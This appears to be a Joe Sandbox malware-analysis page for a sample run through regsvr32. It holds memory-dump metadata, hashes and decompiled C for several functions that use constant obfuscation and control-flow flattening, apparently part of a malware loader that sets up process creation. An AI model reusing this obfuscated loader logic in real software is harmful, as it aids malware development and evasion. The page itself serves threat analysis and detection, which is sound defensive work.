0x040f3de8
0x00000000
0x00000000
0x040f3dee
0x040f3c12
0x040f3c53
0x040f3c58
0x040f3c5a
0x040f3c60
0x040f3c66
0x00000000
0x040f3c66
0x040f3c60
0x040f3c0c
0x040f3c04
0x040f3bf8
0x040f3bec
0x040f3be0
0x040f3dff
0x040f3e02
0x040f3e0b
0x00000000
0x040f3e0b
0x040f3db9
0x040f3dba
0x040f3dc0
0x040f3dd0
0x040f3dd2
0x040f3dd5
0x040f3dd7
0x00000000
0x040f3ddd
0x040f3ddd
0x00000000
0x040f3ddd
0x00000000
0x040f3dd7

Strings

a>, xrefs: 040F3B42
pj, xrefs: 040F3A09
q\1, xrefs: 040F383D
@0, xrefs: 040F3B67
ms2, xrefs: 040F394E
v*, xrefs: 040F3A90
_sC, xrefs: 040F370D
{*, xrefs: 040F36E0

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @0$_sC$a>$ms2$pj$q\1$v*${*
API String ID: 0-3081288078
Opcode ID: 79422180a51d0d39dfe09d63bbba0581959a8f9bb027c69b384dd3f0d6addae5
Instruction ID: 9119793fb6fa74ec9935645fea9d386841a655317d8b3ad2ac502305f4c05d48
Opcode Fuzzy Hash: 79422180a51d0d39dfe09d63bbba0581959a8f9bb027c69b384dd3f0d6addae5
Instruction Fuzzy Hash: 00026271508380DFD3A8CF65C88AA4BBBE1FBC4758F10891DE6DA96260D7B59948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040F46BD, Relevance: 10.3, Strings: 8, Instructions: 293
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E040F46BD(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t316;
				intOrPtr _t339;
				intOrPtr* _t341;
				void* _t343;
				intOrPtr* _t346;
				void* _t348;
				intOrPtr* _t349;
				void* _t351;
				intOrPtr _t367;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t375;
				void* _t376;

				_t369 = _a16;
				_t349 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t316);
				_v16 = 0xd9d351;
				_t367 = 0;
				_v12 = 0x17e122;
				_t376 = _t375 + 0x18;
				_v8 = 0;
				_v96 = 0xcc9d59;
				_t351 = 0xff449f4;
				_v96 = _v96 << 0xc;
				_v96 = _v96 + 0x162d;
				_v96 = _v96 ^ 0xc9d5a62c;
				_v132 = 0x3cc17f;
				_v132 = _v132 + 0xffff84d9;
				_t370 = 0x52;
				_v132 = _v132 * 0x3d;
				_v132 = _v132 << 0xf;
				_v132 = _v132 ^ 0x617c0001;
				_v48 = 0x63951b;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x0000c72a;
				_v64 = 0xbc1395;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000005e0;
				_v80 = 0x50b5ee;
				_v80 = _v80 + 0xf34;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00286291;
				_v92 = 0x9715d8;
				_v92 = _v92 * 0x46;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0xff220000;
				_v52 = 0xfde3f2;
				_v52 = _v52 + 0xa710;
				_v52 = _v52 ^ 0x00fe8b02;
				_v160 = 0x198337;
				_v160 = _v160 + 0xffff007e;
				_v160 = _v160 << 0x10;
				_v160 = _v160 ^ 0x69569842;
				_v160 = _v160 ^ 0xeaeb46e9;
				_v28 = 0xcc69bd;
				_v28 = _v28 ^ 0xeecfab9f;
				_v28 = _v28 ^ 0xee01123b;
				_v136 = 0x76b317;
				_v136 = _v136 / _t370;
				_v136 = _v136 + 0xffff81f3;
				_v136 = _v136 << 3;
				_v136 = _v136 ^ 0x00064d41;
				_v112 = 0x80a4bd;
				_v112 = _v112 * 0x13;
				_v112 = _v112 << 0xa;
				_v112 = _v112 + 0xcad4;
				_v112 = _v112 ^ 0x30efc400;
				_v144 = 0x82a288;
				_v144 = _v144 << 2;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 << 9;
				_v144 = _v144 ^ 0x0011be13;
				_v56 = 0x7edd30;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0x2a184bb4;
				_v88 = 0xe2a415;
				_t371 = 6;
				_v88 = _v88 * 0x2a;
				_v88 = _v88 + 0xffff5f32;
				_v88 = _v88 ^ 0x252ac732;
				_v128 = 0xe004bc;
				_v128 = _v128 ^ 0x574173bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0xd8221cc5;
				_v128 = _v128 ^ 0xd803a3d4;
				_v152 = 0x516ea5;
				_v152 = _v152 + 0xffff4486;
				_v152 = _v152 | 0x140257d0;
				_v152 = _v152 >> 0xf;
				_v152 = _v152 ^ 0x00051039;
				_v120 = 0x9f4975;
				_v120 = _v120 ^ 0x86b89632;
				_v120 = _v120 * 0x24;
				_v120 = _v120 | 0x1b5f0b87;
				_v120 = _v120 ^ 0xdfd1de63;
				_v36 = 0xa5f8e9;
				_v36 = _v36 + 0x714e;
				_v36 = _v36 ^ 0x00af22d8;
				_v44 = 0x824fdb;
				_v44 = _v44 + 0xffff91e5;
				_v44 = _v44 ^ 0x008fd473;
				_v68 = 0x680ab0;
				_v68 = _v68 + 0xbc39;
				_v68 = _v68 / _t371;
				_v68 = _v68 ^ 0x001a68c1;
				_v76 = 0x17a4af;
				_v76 = _v76 >> 0xb;
				_t372 = 0x5b;
				_v76 = _v76 / _t372;
				_v76 = _v76 ^ 0x0007f211;
				_v84 = 0x315e60;
				_v84 = _v84 + 0x702b;
				_v84 = _v84 + 0xffff10cc;
				_v84 = _v84 ^ 0x003e64ec;
				_v100 = 0x9cc34d;
				_v100 = _v100 | 0x947c2ff5;
				_t373 = 0x3a;
				_v100 = _v100 / _t373;
				_v100 = _v100 ^ 0x02979c4b;
				_v140 = 0xbfeff4;
				_v140 = _v140 ^ 0x822e0370;
				_v140 = _v140 + 0xf2f6;
				_v140 = _v140 | 0x96ab8507;
				_v140 = _v140 ^ 0x96bf89b8;
				_v60 = 0xfd95c4;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x07e16726;
				_v148 = 0x38036;
				_v148 = _v148 ^ 0x54103d5f;
				_v148 = _v148 | 0x54303272;
				_t206 =  &_v148; // 0x54303272
				_v148 =  *_t206;
				_v148 = _v148 ^ 0x5432cd2c;
				_v40 = 0xc550eb;
				_v40 = _v40 | 0x63f29c9e;
				_v40 = _v40 ^ 0x63f29262;
				_v32 = 0xf7791b;
				_v32 = _v32 * 0x51;
				_v32 = _v32 ^ 0x4e4d9c2b;
				_v156 = 0xdcae59;
				_v156 = _v156 + 0xffffc6cd;
				_v156 = _v156 + 0xfffffd52;
				_v156 = _v156 ^ 0x46382038;
				_v156 = _v156 ^ 0x46e78b29;
				_v72 = 0xac5d66;
				_v72 = _v72 | 0xb655dd15;
				_v72 = _v72 + 0xffff07b1;
				_v72 = _v72 ^ 0xb6f51c6c;
				_v104 = 0x2e3a8e;
				_v104 = _v104 | 0xfac334a1;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xaefe5277;
				_v108 = 0xcd35f0;
				_v108 = _v108 << 0xf;
				_v108 = _v108 | 0xf31160b4;
				_v108 = _v108 ^ 0xc3cc8d90;
				_v108 = _v108 ^ 0x3831362e;
				_v116 = 0x7e4b3f;
				_v116 = _v116 << 9;
				_v116 = _v116 + 0xa646;
				_v116 = _v116 + 0x5b3c;
				_v116 = _v116 ^ 0xfc982242;
				_v124 = 0x9fd9df;
				_v124 = _v124 >> 6;
				_v124 = _v124 << 0xf;
				_v124 = _v124 << 1;
				_v124 = _v124 ^ 0x7f607f7f;
				do {
					while(_t351 != 0x8274db) {
						if(_t351 == 0x30c1656) {
							_push(_t351);
							_push(_t351);
							_t339 = E040DC5D8(_v20);
							_t376 = _t376 + 0xc;
							_v24 = _t339;
							if(_t339 != 0) {
								_t351 = 0x6ee5562;
								continue;
							}
						} else {
							if(_t351 == 0x6ee5562) {
								_t341 =  *0x40f6224; // 0x0
								_t343 = E040F11B0(_v84, _t351, _v92, _v100, _v132, _v140, _v60, _v148, _v20,  *_t369, _v40,  *((intOrPtr*)(_t369 + 4)), _v32,  &_v20, _v156, _v72, _v24,  *_t341, _v104);
								_t376 = _t376 + 0x48;
								if(_t343 == _v52) {
									 *_t349 = _v24;
									_t367 = 1;
									 *((intOrPtr*)(_t349 + 4)) = _v20;
								} else {
									_t351 = 0x8274db;
									continue;
								}
							} else {
								if(_t351 == 0xc41b31c) {
									_t346 =  *0x40f6224; // 0x0
									_t348 = E040F11B0(_v160, _t351, _v48, _v28, _v96, _v136, _v112, _v144, _v64,  *_t369, _v56,  *((intOrPtr*)(_t369 + 4)), _v88,  &_v20, _v128, _v152, _t367,  *_t346, _v120);
									_t376 = _t376 + 0x48;
									if(_t348 == _v80) {
										_t351 = 0x30c1656;
										continue;
									}
								} else {
									if(_t351 != 0xff449f4) {
										goto L14;
									} else {
										_t351 = 0xc41b31c;
										continue;
									}
								}
							}
						}
						L17:
						return _t367;
					}
					E040F2B09(_v108, _v24, _v116, _v124);
					_t351 = 0xc0b2195;
					L14:
				} while (_t351 != 0xc0b2195);
				goto L17;
			}

0x040f46c6
0x040f46cd
0x040f46d0
0x040f46d1
0x040f46d8
0x040f46df
0x040f46e6
0x040f46e7
0x040f46e8
0x040f46ed
0x040f46f8
0x040f46fa
0x040f4705
0x040f4708
0x040f4711
0x040f4719
0x040f471e
0x040f4723
0x040f472b
0x040f4733
0x040f473b
0x040f474a
0x040f474b
0x040f474f
0x040f4754
0x040f475c
0x040f4767
0x040f476f
0x040f477a
0x040f4782
0x040f4787
0x040f478f
0x040f4797
0x040f479f
0x040f47a3
0x040f47ab
0x040f47b8
0x040f47bc
0x040f47c1
0x040f47c9
0x040f47d4
0x040f47df
0x040f47ea
0x040f47f2
0x040f47fa
0x040f47ff
0x040f4807
0x040f480f
0x040f481a
0x040f4825
0x040f4830
0x040f483e
0x040f4842
0x040f484a
0x040f484f
0x040f4857
0x040f4864
0x040f4868
0x040f486d
0x040f4875
0x040f487d
0x040f4885
0x040f488a
0x040f488f
0x040f4894
0x040f489c
0x040f48a9
0x040f48ad
0x040f48b5
0x040f48c6
0x040f48c9
0x040f48cd
0x040f48d5
0x040f48dd
0x040f48e5
0x040f48ed
0x040f48f2
0x040f48fa
0x040f4902
0x040f490a
0x040f4912
0x040f491a
0x040f491f
0x040f4927
0x040f492f
0x040f493c
0x040f4940
0x040f4948
0x040f4950
0x040f495b
0x040f4966
0x040f4971
0x040f497c
0x040f4987
0x040f4992
0x040f499a
0x040f49aa
0x040f49ae
0x040f49b6
0x040f49be
0x040f49c7
0x040f49cc
0x040f49d2
0x040f49da
0x040f49e2
0x040f49ea
0x040f49f2
0x040f49fa
0x040f4a02
0x040f4a0e
0x040f4a11
0x040f4a15
0x040f4a1d
0x040f4a25
0x040f4a2d
0x040f4a35
0x040f4a3d
0x040f4a45
0x040f4a4d
0x040f4a52
0x040f4a5a
0x040f4a62
0x040f4a6a
0x040f4a72
0x040f4a76
0x040f4a7a
0x040f4a82
0x040f4a8d
0x040f4a98
0x040f4aa3
0x040f4ab6
0x040f4abd
0x040f4ac8
0x040f4ad0
0x040f4ad8
0x040f4ae0
0x040f4aed
0x040f4af5
0x040f4afd
0x040f4b05
0x040f4b0d
0x040f4b15
0x040f4b1d
0x040f4b25
0x040f4b2a
0x040f4b32
0x040f4b3a
0x040f4b3f
0x040f4b47
0x040f4b4f
0x040f4b57
0x040f4b5f
0x040f4b64
0x040f4b6c
0x040f4b74
0x040f4b7c
0x040f4b84
0x040f4b89
0x040f4b8e
0x040f4b92
0x040f4b9a
0x040f4b9a
0x040f4ba8
0x040f4cdd
0x040f4cde
0x040f4ce6
0x040f4ceb
0x040f4cee
0x040f4cf7
0x040f4cf9
0x00000000
0x040f4cf9
0x040f4bae
0x040f4bb4
0x040f4c4e
0x040f4caf
0x040f4cb4
0x040f4cbe
0x040f4d39
0x040f4d3b
0x040f4d43
0x040f4cc0
0x040f4cc0
0x00000000
0x040f4cc0
0x040f4bba
0x040f4bc0
0x040f4bd9
0x040f4c2e
0x040f4c33
0x040f4c3a
0x040f4c40
0x00000000
0x040f4c40
0x040f4bc2
0x040f4bc8
0x00000000
0x040f4bce
0x040f4bce
0x00000000
0x040f4bce
0x040f4bc8
0x040f4bc0
0x040f4bb4
0x040f4d46
0x040f4d52
0x040f4d52
0x040f4d16
0x040f4d1d
0x040f4d22
0x040f4d22
0x00000000

Strings

F, xrefs: 040F4807
.618, xrefs: 040F4B4F
8 8F, xrefs: 040F4AE0
?K~, xrefs: 040F4B57
d>, xrefs: 040F49F2
<[, xrefs: 040F4B6C
r20T, xrefs: 040F4A72
Nq, xrefs: 040F495B

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .618$8 8F$<[$?K~$Nq$r20T$F$d>
API String ID: 0-914106314
Opcode ID: 38292b94e652a1d7a57472e128c19817db0f64865d5fdd0ba32f0c3b21b4281c
Instruction ID: 248ed326789c4a30e650fc3b1edc185ecefef63f0b8250d64c09a94c56412989
Opcode Fuzzy Hash: 38292b94e652a1d7a57472e128c19817db0f64865d5fdd0ba32f0c3b21b4281c
Instruction Fuzzy Hash: E1F1FE71009380DFD769CF61C989A4BBBF1FB95748F108A1DE2DA96260D3B69948CF03

Uniqueness

Uniqueness Score: -1.00%

Function 040E017B, Relevance: 10.3, Strings: 8, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E040E017B(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _t272;
				void* _t295;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				void* _t312;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a32);
				_t334 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t272 = E040EFE29(0);
				_v84 = _t272;
				_t338 =  &(( &_v196)[0xa]);
				_v72 = _t272;
				_t335 = _t272;
				_v80 = 0x49e87b;
				_v76 = 0xc5c8e1;
				_t312 = 0x7956bd9;
				_v96 = 0x2d2511;
				_t305 = 0x6f;
				_v96 = _v96 / _t305;
				_v96 = _v96 ^ 0x00006c1e;
				_v192 = 0x2be237;
				_t22 =  &_v192; // 0x2be237
				_t306 = 0x35;
				_v192 =  *_t22 * 0x2a;
				_v192 = _v192 ^ 0x8f196f07;
				_v192 = _v192 ^ 0x2da4b7e5;
				_v192 = _v192 ^ 0xa58ec5c4;
				_v172 = 0x207d98;
				_v172 = _v172 ^ 0x972b32db;
				_v172 = _v172 | 0x9c7c4c28;
				_v172 = _v172 * 0x48;
				_v172 = _v172 ^ 0xdbcfdb8a;
				_v100 = 0x57c7e;
				_v100 = _v100 + 0xffffdd89;
				_v100 = _v100 ^ 0x000aed2d;
				_v124 = 0x64cad1;
				_v124 = _v124 + 0xffff2d5b;
				_v124 = _v124 << 4;
				_v124 = _v124 ^ 0x063cb223;
				_v148 = 0xd38c19;
				_v148 = _v148 >> 7;
				_v148 = _v148 >> 0xf;
				_v148 = _v148 ^ 0x0008e1ac;
				_v88 = 0xe6598d;
				_v88 = _v88 ^ 0xb40d33dc;
				_v88 = _v88 ^ 0xb4eaaa1c;
				_v92 = 0x85b818;
				_v92 = _v92 + 0xffffc4c3;
				_v92 = _v92 ^ 0x008e2283;
				_v104 = 0x6cafca;
				_v104 = _v104 * 0x73;
				_v104 = _v104 ^ 0x30d8f33f;
				_v120 = 0xea107;
				_v120 = _v120 / _t306;
				_v120 = _v120 ^ 0x000228b8;
				_v112 = 0x4bcc54;
				_v112 = _v112 * 0x3f;
				_v112 = _v112 ^ 0x12af13c7;
				_v176 = 0x25f352;
				_v176 = _v176 * 0x1d;
				_t307 = 0x55;
				_v176 = _v176 / _t307;
				_v176 = _v176 + 0xa166;
				_v176 = _v176 ^ 0x00018b34;
				_v168 = 0x70163a;
				_v168 = _v168 | 0xb665b778;
				_v168 = _v168 + 0xffff15cb;
				_v168 = _v168 + 0xffff931b;
				_v168 = _v168 ^ 0xb6787764;
				_v184 = 0xfb3451;
				_t308 = 0x2f;
				_v184 = _v184 * 0x55;
				_v184 = _v184 + 0xffff75a5;
				_v184 = _v184 * 0x5c;
				_v184 = _v184 ^ 0xf953722f;
				_v160 = 0x3448db;
				_v160 = _v160 | 0x0a9a3806;
				_v160 = _v160 + 0xffffbb3e;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0xaf82d104;
				_v108 = 0x7f4bc6;
				_v108 = _v108 * 0x47;
				_v108 = _v108 ^ 0x234271fe;
				_v116 = 0x137e80;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0x09bed852;
				_v140 = 0x58b738;
				_v140 = _v140 >> 3;
				_v140 = _v140 / _t308;
				_v140 = _v140 ^ 0x0006291c;
				_v152 = 0x1dae44;
				_v152 = _v152 + 0xb010;
				_t309 = 0x7a;
				_v152 = _v152 / _t309;
				_v152 = _v152 ^ 0x0004435a;
				_v136 = 0x3e9c6a;
				_v136 = _v136 + 0xffff4267;
				_v136 = _v136 + 0xa013;
				_v136 = _v136 ^ 0x00313444;
				_v128 = 0xfc4661;
				_v128 = _v128 ^ 0x84ef8931;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x021c54a7;
				_v144 = 0x2fd65c;
				_v144 = _v144 | 0x65ad1a2d;
				_v144 = _v144 ^ 0x87299bd7;
				_v144 = _v144 ^ 0xe281bdf5;
				_v180 = 0x40c6e5;
				_v180 = _v180 + 0xffff5f75;
				_v180 = _v180 + 0x6863;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x08e53add;
				_v132 = 0x50fbcf;
				_v132 = _v132 | 0xda091e24;
				_v132 = _v132 + 0xffffc3f6;
				_v132 = _v132 ^ 0xda5ae4d8;
				_v188 = 0x29fd87;
				_v188 = _v188 | 0x249d2c08;
				_v188 = _v188 << 1;
				_v188 = _v188 | 0xc4033418;
				_v188 = _v188 ^ 0xcd7b5999;
				_v196 = 0x78de76;
				_v196 = _v196 * 0x7c;
				_v196 = _v196 + 0xffff171c;
				_v196 = _v196 >> 5;
				_v196 = _v196 ^ 0x01d3afb7;
				_v156 = 0x2e37f5;
				_v156 = _v156 + 0xffff32dd;
				_v156 = _v156 >> 1;
				_v156 = _v156 * 0x73;
				_v156 = _v156 ^ 0x0a367c41;
				_v164 = 0x79bcb0;
				_v164 = _v164 + 0x8106;
				_v164 = _v164 + 0x4469;
				_v164 = _v164 + 0xffff19e3;
				_v164 = _v164 ^ 0x007fae8c;
				do {
					while(_t312 != 0x59e10b1) {
						if(_t312 == 0x7956bd9) {
							_t312 = 0x84e17ac;
							continue;
						} else {
							if(_t312 == 0x84e17ac) {
								_t264 =  &_v84; // 0x49e87b
								_t267 =  &_v172; // 0xa367c41
								_t295 = E040E4178( *_t267, _v100, _t264, _a20, _v124);
								_t338 =  &(_t338[4]);
								__eflags = _t295;
								if(_t295 != 0) {
									_t312 = 0x9148c69;
									continue;
								}
							} else {
								_t344 = _t312 - 0x9148c69;
								if(_t312 != 0x9148c69) {
									goto L10;
								} else {
									E040EFE2A(_v148, _v88, 0x44,  &_v68);
									_push(_v112);
									_v68 = 0x44;
									_push(_v120);
									_push(_v104);
									_v60 = E040EE1F8(0x40d1224, _v92, _t344);
									_t335 = E040D473D(_a20, _v176, _v168, 0x40d1224, 0x40d1224, _v184, _v160, 0, _a24, _v108, _t334, _v116, _v140, _v152, _v84, 0x40d1224, _v136, _v128, _v144, _v192 | _v96,  &_v68);
									E040EFECB(_v60, _v180, _v132, _v188, _v196);
									_t338 =  &(_t338[0x1c]);
									_t312 = 0x59e10b1;
									continue;
								}
							}
						}
						goto L11;
					}
					_t269 =  &_v84; // 0x49e87b
					E040E7952(_v156,  *_t269, _v164);
					_t312 = 0xf5fdc0f;
					L10:
					__eflags = _t312 - 0xf5fdc0f;
				} while (_t312 != 0xf5fdc0f);
				L11:
				return _t335;
			}

0x040e0185
0x040e018e
0x040e0190
0x040e0197
0x040e019e
0x040e01a5
0x040e01ac
0x040e01b3
0x040e01b4
0x040e01bb
0x040e01bc
0x040e01bd
0x040e01c2
0x040e01c9
0x040e01cc
0x040e01d3
0x040e01d5
0x040e01e2
0x040e01ed
0x040e01f2
0x040e0200
0x040e0205
0x040e020b
0x040e0213
0x040e021b
0x040e0220
0x040e0221
0x040e0225
0x040e022d
0x040e0235
0x040e023d
0x040e0245
0x040e024d
0x040e025a
0x040e025e
0x040e0266
0x040e026e
0x040e0276
0x040e027e
0x040e0286
0x040e028e
0x040e0293
0x040e029b
0x040e02a3
0x040e02a8
0x040e02ad
0x040e02b5
0x040e02bd
0x040e02c5
0x040e02cd
0x040e02d5
0x040e02dd
0x040e02e5
0x040e02f2
0x040e02f6
0x040e02fe
0x040e030c
0x040e0310
0x040e0318
0x040e0325
0x040e0329
0x040e0331
0x040e033e
0x040e034a
0x040e034f
0x040e0355
0x040e035d
0x040e0365
0x040e036d
0x040e0375
0x040e037d
0x040e0385
0x040e038d
0x040e039a
0x040e039d
0x040e03a1
0x040e03ae
0x040e03b2
0x040e03ba
0x040e03c2
0x040e03ca
0x040e03d2
0x040e03d7
0x040e03df
0x040e03ec
0x040e03f0
0x040e03f8
0x040e0400
0x040e0405
0x040e040d
0x040e0415
0x040e0422
0x040e0426
0x040e042e
0x040e0436
0x040e0442
0x040e0445
0x040e0449
0x040e0451
0x040e0459
0x040e0461
0x040e0469
0x040e0471
0x040e0479
0x040e0481
0x040e0486
0x040e048e
0x040e0496
0x040e049e
0x040e04a6
0x040e04ae
0x040e04b6
0x040e04be
0x040e04c6
0x040e04cb
0x040e04d3
0x040e04db
0x040e04e3
0x040e04eb
0x040e04f3
0x040e04fb
0x040e0503
0x040e0507
0x040e050f
0x040e0517
0x040e0524
0x040e0528
0x040e0530
0x040e0535
0x040e053d
0x040e054a
0x040e0557
0x040e0560
0x040e0564
0x040e056c
0x040e0574
0x040e057c
0x040e0584
0x040e058c
0x040e0594
0x040e0594
0x040e05a6
0x040e06c4
0x00000000
0x040e05ac
0x040e05ae
0x040e069a
0x040e06ad
0x040e06b1
0x040e06b6
0x040e06b9
0x040e06bb
0x040e06bd
0x00000000
0x040e06bd
0x040e05b4
0x040e05b4
0x040e05b6
0x00000000
0x040e05bc
0x040e05ce
0x040e05d3
0x040e05dc
0x040e05e7
0x040e05eb
0x040e05fe
0x040e066c
0x040e0684
0x040e0689
0x040e068c
0x00000000
0x040e068c
0x040e05b6
0x040e05ae
0x00000000
0x040e05a6
0x040e06cf
0x040e06da
0x040e06e0
0x040e06e5
0x040e06e5
0x040e06e5
0x040e06f2
0x040e06fd

Strings

D, xrefs: 040E05DC
{I, xrefs: 040E069A, 040E06A8
-, xrefs: 040E0276
D41, xrefs: 040E0469
A|6, xrefs: 040E06AD
7+, xrefs: 040E021B
ch, xrefs: 040E04BE
iD, xrefs: 040E057C

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -$7+$A|6$D$D41$ch$iD${I
API String ID: 0-1622838380
Opcode ID: bd2753a0188b9aa463b464cc79a499a8870708de6db9291139db42bc15321214
Instruction ID: ae434bfb9376033db8f0450af37f7d6b71b8925aa4a892475e34fe1335c7f956
Opcode Fuzzy Hash: bd2753a0188b9aa463b464cc79a499a8870708de6db9291139db42bc15321214
Instruction Fuzzy Hash: B5D11FB25083819FD3A8CF61C889A1BFBE1FBC5358F508A1DF69596260D3B59958CF03

Uniqueness

Uniqueness Score: -1.00%

Function 040E27F9, Relevance: 10.2, Strings: 8, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E040E27F9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				short* _t249;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t260;
				intOrPtr _t267;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int* _t294;

				_t294 =  &_v1144;
				_v1076 = 0xe2454d;
				_v1076 = _v1076 << 0xe;
				_t260 = 0xa27996a;
				_v1076 = _v1076 ^ 0x9150c829;
				_v1116 = 0xb7d7ba;
				_v1116 = _v1116 >> 3;
				_v1116 = _v1116 * 0x45;
				_v1116 = _v1116 ^ 0x0637cdcd;
				_v1064 = 0x633f3;
				_t288 = 7;
				_v1064 = _v1064 / _t288;
				_v1064 = _v1064 ^ 0x000e68da;
				_v1044 = 0x68e137;
				_v1044 = _v1044 >> 8;
				_v1044 = _v1044 ^ 0x000f94d8;
				_v1104 = 0x560a82;
				_t289 = 0x4d;
				_v1104 = _v1104 * 0x12;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0x32f73e43;
				_v1128 = 0x20b49c;
				_v1128 = _v1128 + 0xffff9350;
				_v1128 = _v1128 / _t289;
				_v1128 = _v1128 + 0xffff69f1;
				_v1128 = _v1128 ^ 0xfff8ef71;
				_v1144 = 0xda057e;
				_v1144 = _v1144 | 0x61d5fb11;
				_v1144 = _v1144 + 0x9b0d;
				_t290 = 0x47;
				_v1144 = _v1144 / _t290;
				_v1144 = _v1144 ^ 0x016fc7d6;
				_v1108 = 0xd954d9;
				_v1108 = _v1108 >> 3;
				_v1108 = _v1108 * 0x2a;
				_v1108 = _v1108 ^ 0x047d2f3f;
				_v1084 = 0xee9532;
				_v1084 = _v1084 | 0x01e1ea12;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0xb61982a0;
				_v1136 = 0x9da312;
				_v1136 = _v1136 * 0xb;
				_v1136 = _v1136 + 0xfaec;
				_v1136 = _v1136 << 4;
				_v1136 = _v1136 ^ 0x6c675c41;
				_v1048 = 0x5b4722;
				_v1048 = _v1048 + 0x58c6;
				_v1048 = _v1048 ^ 0x0051fe1e;
				_v1140 = 0xb81c47;
				_v1140 = _v1140 | 0xf47f3da9;
				_v1140 = _v1140 + 0xffffb1b6;
				_v1140 = _v1140 * 0x52;
				_v1140 = _v1140 ^ 0x79a8ba01;
				_v1100 = 0x4ec91e;
				_v1100 = _v1100 + 0xffff658a;
				_v1100 = _v1100 + 0xa7da;
				_v1100 = _v1100 ^ 0x004d9e7a;
				_v1056 = 0xd22e34;
				_v1056 = _v1056 * 0x39;
				_v1056 = _v1056 ^ 0x2eccf222;
				_v1092 = 0x4415ff;
				_v1092 = _v1092 << 0xc;
				_v1092 = _v1092 + 0xffffcb4f;
				_v1092 = _v1092 ^ 0x4156ca29;
				_v1112 = 0xebdea7;
				_v1112 = _v1112 + 0xffff30b5;
